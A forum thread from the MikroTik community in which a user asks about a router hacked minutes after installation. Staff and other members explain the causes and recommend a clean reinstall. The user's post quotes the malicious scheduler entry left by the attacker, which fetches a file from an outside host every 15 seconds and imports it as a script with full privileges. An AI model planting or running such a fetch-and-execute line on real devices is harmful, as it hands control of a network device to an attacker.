Community discussions

MikroTik App
 
sewlist
Frequent Visitor
Frequent Visitor
Topic Author
Posts: 70
Joined: Fri Jun 02, 2006 3:48 pm

Routerboard Hacked question

Wed Dec 12, 2018 3:06 pm

Hi Guys

My installer installed a new router, and 5mins later before we could upgrade it was hacked

Only thing we saw that was changed was this scheduler added

Does anyone know what this mean

0 X name="U6" start-time=startup interval=15s on-event=/tool fetch url=http://fanmusic.xyz/poll/25e93549-c1a1- ... 05bb514ab6 mode=http dst-path=7wmp0b4swouv\r\n/import 7wmp0b4swouv owner="admin" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive run-count=0



S
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 26918
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia
Contact:

Re: Routerboard Hacked question

Wed Dec 12, 2018 3:08 pm

why don't you check the contents of that new file, that this scheduler downloaded ? it's in the files section now.

I suggest Netinstalling the device, and never give access to your device from the internet, where is your firewall ?
 
mistry7
Forum Guru
Forum Guru
Posts: 1480
Joined: Tue Oct 13, 2009 11:57 am
Location: Germany

Re: Routerboard Hacked question

Wed Dec 12, 2018 3:09 pm

Forgot to set Admin pass ???
Use newest ROS!
 
sewlist
Frequent Visitor
Frequent Visitor
Topic Author
Posts: 70
Joined: Fri Jun 02, 2006 3:48 pm

Re: Routerboard Hacked question

Wed Dec 12, 2018 3:12 pm

Agree with all of you, Rookie error from my teams

We will reinstall router clean

S
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 26918
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia
Contact:

Re: Routerboard Hacked question

Wed Dec 12, 2018 3:13 pm

Yes.

1. Used old RouterOS
2. Removed the default firewall
3. Forgot to set password
4. Connnected it to the internet without any firewall

No need to hack anything, just begging for trouble.

Who is online

Users browsing this forum: sirbryan and 56 guests